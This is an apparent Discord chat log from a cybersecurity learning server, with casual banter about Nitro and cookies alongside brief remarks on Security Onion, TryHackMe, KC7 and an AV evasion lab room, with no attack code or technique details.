I finally have security onion doing what I want it to do.
fluff's a cool dude but I don't get the idolization
That was an annoying week.
so..why do people idolize him then?
join the veggiebox club
Can you remove the image?
what do i get if i join? 🤔
If you give me nitro, I will
pass
Sudo
Sue
You got the answer i guess lol
Ls
ls -d */
I’ll give you a cookie exchange for nitro
#feedback-and-ideas please.
You're giving me, who's a cookie, a cookie?
For me to give you nitro?
There is a link. 😄
Aye. I'm juggling between a couple of learning sources, TryHackMe and KC7, both seem to have benefits for SOC
AV Evasion: Shellcode room decided to remind me of the pain
A cult 💀 what in gods name
The quadfather
Thanks for that recommendation, just finished, had a lot of fun and learned a lot
Gave +1 Rep to @half girder (current: #136 - 59)
Yes, family member for nitro

